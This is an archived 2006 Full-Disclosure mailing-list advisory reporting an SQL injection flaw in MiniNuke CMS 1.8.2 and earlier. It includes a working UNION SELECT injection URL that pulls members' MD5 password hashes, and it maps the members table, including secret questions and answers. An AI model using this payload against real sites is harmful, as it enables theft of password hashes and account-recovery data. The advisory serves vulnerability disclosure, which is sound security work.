lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 12 Jan 2006 22:32:17 -0600 From: nukedx@...edx.com To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, orhankara@...lshosting.com Subject: Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection vulnerability --Security Report-- Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 12/01/06 08:47 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@...edx.com Web: http://www.nukedx.com } --- Vendor: MiniNuke (www.miniex.net) Version: 1.8.2 and prior versions must be affected. About:Via this method remote attacker can inject SQL query to the news.asp --- How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery] http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52 Columns of MEMBERS: uye_id = userid sifre = md5 password hash g_soru = secret question. g_cevap = secret answer email = mail address isim = name icq = ICQ Uin msn = MSN Sn. aim = AIM Sn. meslek = job cinsiyet = gender yas = age url = url imza = signature mail_goster = show mail :P avurl = avatar url avatar = avatar -- Thanks to ajan;) Regards, >From the NWPX team, nuker a.k.a nukedx _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists